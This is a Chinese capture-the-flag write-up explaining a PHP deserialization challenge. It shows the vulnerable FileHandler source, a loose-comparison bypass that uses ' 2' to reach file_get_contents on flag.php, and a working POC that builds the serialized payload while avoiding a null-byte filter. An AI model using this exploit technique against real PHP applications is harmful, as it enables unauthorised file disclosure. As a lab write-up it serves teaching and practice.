这个题目没什么难度,就是一个简单的php反序列化+php弱类型比较
根据题目提示 猜测就可能是反序列化
打开题目 给的是源码 发现unserialize函数 确定是反序列化
阅读源码 寻找POP链
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
//这里使用的是 == 弱类型判断 我们是要读取本目录下的flag.php的
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
...
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
//2.触发这个但是这里有一个修改值 我们根据后续发现$this->op应该要等于2的 因为等于2是读取文件
//这里使用的是===绝对判断相等 结合后续使用的是==弱类型判断 所以这里可以进行绕过 这里是字符串进行比较,不是字符串和数字进行比较(因为我刚开始当作数字和字符串比较 一直无法绕过) 前面加空格即可
// $this->op = " 2";
// $this->filename = "flag.php";
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
...
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {
//1.触发 __wakeup()和 __destruct()
$obj = unserialize($str);
}
}
POC
class FileHandler {
public $op;
public $filename;
function __construct() {
$this->op = " 2";
$this->filename = "flag.php";
}
}
echo (serialize(new FileHandler()));
对咯!有一点为什么源码对变量的引用是protected而我是用的是public ?
首先,因为php v7.x反序列化的时候对访问类别不敏感,所以可以变化
其次,public变量直接变量名反序列化出来,protected变量\x00 + * + \x00 + 变量名,private变量\x00 + 类名 + \x00 + 变量名
题目中有一个is_valid有效性验证输入,要求必须在ASCII32-127可见字符内,但是\x00的ASCII码是0所以我们要使用public类型 进行算是绕过吧